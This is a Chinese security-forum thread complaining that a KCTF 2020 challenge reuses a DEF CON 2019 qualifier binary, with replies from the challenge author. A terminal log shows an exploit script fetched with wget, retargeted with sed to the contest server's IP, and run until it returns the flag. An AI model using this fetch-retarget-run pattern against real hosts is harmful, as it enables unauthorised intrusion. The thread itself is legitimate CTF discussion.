建议同时取消本题攻击方、防守方的分数

分析

下载程序之后，参与过 2019 年的 DEF CON CTF Qualifier 的人就会感觉到一股熟悉，没错，这个程序正是原封原样照抄的，只改了提示的字符串，甚至连 write 的时候的长度都没改，导致输出的提示长的不太正常（多了个 "\x00S"）。

在放出的第一天没有人提交 flag，是因为部署到了 Ubuntu 16.04 上，而 16.04 的 libc 恰好破坏了程序中埋的 secret 未擦除的 bug。当然，通过这里描述的解法也还是能解的，不过要针对远程环境调一下 cacheline grooming 的样子，还要跑一个 16-bit 的暴力，估计吓退了一些人吧。

解决

直接拿以前的 exploit 运行即可。或者直接下载运行别人写好的 exploit：

$ wget 'f2bK9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6Y4K9i4c8Z5N6h3u0Q4x3X3g2U0L8$3#2Q4x3V1k6V1j5i4k6A6k6o6V1@1x3X3A6Q4x3V1k6U0N6r3k6Q4x3X3c8%4M7X3W2@1k6i4g2H3M7#2)9J5c8Y4u0S2N6#2)9J5c8X3#2S2M7%4c8W2M7W2)9J5c8X3c8W2k6X3y4G2L8W2)9J5k6s2q4#2j5h3I4K6i4K6u0V1x3U0l9I4z5g2)9J5c8X3S2G2N6r3g2D9i4K6u0V1j5$3q4D9K9h3k6G2M7X3&6A6j5g2)9J5c8X3S2G2N6r3g2D9i4K6u0W2M7s2W2Q4x3U0M7`.
--2020-04-24 10:31:22--  b8dK9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6Y4K9i4c8Z5N6h3u0Q4x3X3g2U0L8$3#2Q4x3V1k6V1j5i4k6A6k6o6V1@1x3X3A6Q4x3V1k6U0N6r3k6Q4x3X3c8%4M7X3W2@1k6i4g2H3M7#2)9J5c8Y4u0S2N6#2)9J5c8X3#2S2M7%4c8W2M7W2)9J5c8X3c8W2k6X3y4G2L8W2)9J5k6s2q4#2j5h3I4K6i4K6u0V1x3U0l9I4z5g2)9J5c8X3S2G2N6r3g2D9i4K6u0V1j5$3q4D9K9h3k6G2M7X3&6A6j5g2)9J5c8X3S2G2N6r3g2D9i4K6u0W2M7s2V1`.
Resolving github.com (github.com)... 15.164.81.167
Connecting to github.com (github.com)|15.164.81.167|:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: 0f2K9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6J5j5i4N6Q4x3X3g2Y4K9i4c8Z5N6h3u0#2M7$3g2J5j5$3!0F1N6r3g2F1N6q4)9J5k6h3y4G2L8g2)9J5c8X3c8S2N6X3W2V1z5e0b7J5K9W2)9J5c8X3y4@1k6W2)9J5k6s2N6J5K9i4c8W2N6i4m8K6i4K6u0r3L8h3q4K6N6r3g2J5i4K6u0r3k6r3g2X3j5$3!0F1i4K6u0V1M7i4g2S2L8s2y4Q4x3X3b7J5x3o6p5&6i4K6u0r3K9r3!0@1k6h3I4Q4x3X3c8U0j5h3I4A6k6X3!0J5L8X3W2S2i4K6u0r3K9r3!0@1k6h3I4Q4x3X3g2H3P5b7`.`. [following]
--2020-04-24 10:31:22--  38cK9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6J5j5i4N6Q4x3X3g2Y4K9i4c8Z5N6h3u0#2M7$3g2J5j5$3!0F1N6r3g2F1N6q4)9J5k6h3y4G2L8g2)9J5c8X3c8S2N6X3W2V1z5e0b7J5K9W2)9J5c8X3y4@1k6W2)9J5k6s2N6J5K9i4c8W2N6i4m8K6i4K6u0r3L8h3q4K6N6r3g2J5i4K6u0r3k6r3g2X3j5$3!0F1i4K6u0V1M7i4g2S2L8s2y4Q4x3X3b7J5x3o6p5&6i4K6u0r3K9r3!0@1k6h3I4Q4x3X3c8U0j5h3I4A6k6X3!0J5L8X3W2S2i4K6u0r3K9r3!0@1k6h3I4Q4x3X3g2H3P5b7`.`.
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.0.133, 151.101.64.133, 151.101.128.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.0.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1244 (1.2K) [text/plain]
Saving to: ‘hotel.py’

hotel.py                                                  100%[=====================================================================================================================================>]   1.21K  --.-KB/s    in 0s

2020-04-24 10:31:23 (19.6 MB/s) - ‘hotel.py’ saved [1244/1244]

$ sed -i s/hotelcalifornia.quals2019.oooverflow.io/47.102.223.17/g hotel.py
$ sed -i s/7777/10000/g hotel.py
$ sed -i s/FLAG.txt/flag/g hotel.py
$ python hotel.py mdzz
<...略...>
[*] Switching to interactive mode
Welcome to the 2020kanxueCTF.
\x00
S
Shellcode > \x00
(get 1024 bytes)
We are We failed!

Shellcode > \x00
(get 0 bytes)
flag{a01e62c0-17f8-4ec9-8be6-37e0a768f5d8}
[*] Closed connection to 47.102.223.17 port 10000
[*] Got EOF while reading in interactive

如果这样的题目分数都保留，这比赛还有什么意义？

[培训]内核驱动高级班，冲击BAT一流互联网大厂工作，每周日13:00-18:00直播授课

最后于 2020-4-24 19:15 被kanxue编辑，原因：

收藏・0

免费・2

支持

最新回复 (5)
DayJun 雪币： 957 活跃值： (121) 能力值： ( LV2，RANK：15 ) 在线值：发帖 8 回帖 13 粉丝 1 关注私信	DayJun 2 楼这题防守方不配有分数 2020-4-24 12:14 0
0xbird 雪币： 3051 活跃值： (1392) 能力值： ( LV13，RANK：480 ) 在线值：发帖 28 回帖 51 粉丝 84 关注私信	0xbird 7 3 楼题目是我这边出的，其实是patch了其中的一个漏洞的，后面的unsorted bin堆分配也做了修改，当时改这个题是因为觉得Intel CPU 的 TSX漏洞在国内讨论还是挺少的，这个题目对于学习TSX漏洞很有帮助，毕竟国内去看defcon题目的人还是少数，比赛也不是为了难为选手，原来的exp我测试是无法跑通的，正常解法是修改xtest完成内存开锁，我这边取消分数没有问题。 2020-4-24 12:20 1
Riatre 雪币： 6435 活跃值： (441) 能力值： ( LV12，RANK：831 ) 在线值：发帖 19 回帖 31 粉丝 40 关注私信	Riatre 8 4 楼 0xbird 题目是我这边出的，其实是patch了其中的一个漏洞的，后面的unsorted bin堆分配也做了修改，当时改这个题是因为觉得Intel CPU 的 TSX漏洞在国内讨论还是挺少的，这个题目对于学习TS ... 感谢作者出来说明。我这边考虑过是补掉了其中的一个 bug，因为的确补掉这个 bug 之后仍然是可解的，但晚上组织方重新部署了这个题目，让原来的 exploit 可以跑通，就造成了问题。两点建议： 1. 出基于以前的题目修改的题目的时候应该明确给出引用，确保每个人都知道这道题目在历史上曾经出现过的时间、名字。否则在公平性上恐怕会有争议。 2. 这种题目依赖于环境可能造成预料之外的解法的情况提前和组织方沟通好，说明确实是故意采用某种环境的，避免误会。 2020-4-24 13:21 0
0xbird 雪币： 3051 活跃值： (1392) 能力值： ( LV13，RANK：480 ) 在线值：发帖 28 回帖 51 粉丝 84 关注私信	0xbird 7 5 楼 Riatre 感谢作者出来说明。我这边考虑过是补掉了其中的一个 bug，因为的确补掉这个 bug 之后仍然是可解的，但晚上组织方重新部署了这个题目，让原来的 exploit 可以跑通，就造成了问题。 ... 晚上有师傅说云环境无法触发漏洞，所以紧急更换了服务器，确实是歪打正着踩坑了，以后会更加严谨一些。 2020-4-24 13:25 0
大帅锅雪币： 16754 活跃值： (7296) 能力值： ( LV13，RANK：923 ) 在线值：发帖 38 回帖 219 粉丝 89 关注私信	大帅锅 4 6 楼 0xbird 晚上有师傅说云环境无法触发漏洞，所以紧急更换了服务器，确实是歪打正着踩坑了，以后会更加严谨一些。看来是作者踩坑里了 2020-4-24 14:27 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

Riatre

发帖

回帖

831

RANK

关注

私信

他的文章

关于我们

联系我们

企业服务

看雪公众号

最新回复 (5)
DayJun 雪币： 957 活跃值： (121) 能力值： ( LV2，RANK：15 ) 在线值：发帖 8 回帖 13 粉丝 1 关注私信	DayJun 2 楼这题防守方不配有分数 2020-4-24 12:14 0
0xbird 雪币： 3051 活跃值： (1392) 能力值： ( LV13，RANK：480 ) 在线值：发帖 28 回帖 51 粉丝 84 关注私信	0xbird 7 3 楼题目是我这边出的，其实是patch了其中的一个漏洞的，后面的unsorted bin堆分配也做了修改，当时改这个题是因为觉得Intel CPU 的 TSX漏洞在国内讨论还是挺少的，这个题目对于学习TSX漏洞很有帮助，毕竟国内去看defcon题目的人还是少数，比赛也不是为了难为选手，原来的exp我测试是无法跑通的，正常解法是修改xtest完成内存开锁，我这边取消分数没有问题。 2020-4-24 12:20 1
Riatre 雪币： 6435 活跃值： (441) 能力值： ( LV12，RANK：831 ) 在线值：发帖 19 回帖 31 粉丝 40 关注私信	Riatre 8 4 楼 0xbird 题目是我这边出的，其实是patch了其中的一个漏洞的，后面的unsorted bin堆分配也做了修改，当时改这个题是因为觉得Intel CPU 的 TSX漏洞在国内讨论还是挺少的，这个题目对于学习TS ... 感谢作者出来说明。我这边考虑过是补掉了其中的一个 bug，因为的确补掉这个 bug 之后仍然是可解的，但晚上组织方重新部署了这个题目，让原来的 exploit 可以跑通，就造成了问题。两点建议： 1. 出基于以前的题目修改的题目的时候应该明确给出引用，确保每个人都知道这道题目在历史上曾经出现过的时间、名字。否则在公平性上恐怕会有争议。 2. 这种题目依赖于环境可能造成预料之外的解法的情况提前和组织方沟通好，说明确实是故意采用某种环境的，避免误会。 2020-4-24 13:21 0
0xbird 雪币： 3051 活跃值： (1392) 能力值： ( LV13，RANK：480 ) 在线值：发帖 28 回帖 51 粉丝 84 关注私信	0xbird 7 5 楼 Riatre 感谢作者出来说明。我这边考虑过是补掉了其中的一个 bug，因为的确补掉这个 bug 之后仍然是可解的，但晚上组织方重新部署了这个题目，让原来的 exploit 可以跑通，就造成了问题。 ... 晚上有师傅说云环境无法触发漏洞，所以紧急更换了服务器，确实是歪打正着踩坑了，以后会更加严谨一些。 2020-4-24 13:25 0
大帅锅雪币： 16754 活跃值： (7296) 能力值： ( LV13，RANK：923 ) 在线值：发帖 38 回帖 219 粉丝 89 关注私信	大帅锅 4 6 楼 0xbird 晚上有师傅说云环境无法触发漏洞，所以紧急更换了服务器，确实是歪打正着踩坑了，以后会更加严谨一些。看来是作者踩坑里了 2020-4-24 14:27 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

[建议] 看雪.安恒2020 KCTF春季赛 第五题 闻鸡起舞

建议同时取消本题攻击方、防守方的分数

分析

解决

如果这样的题目分数都保留，这比赛还有什么意义？

[建议] 看雪.安恒2020 KCTF春季赛第五题闻鸡起舞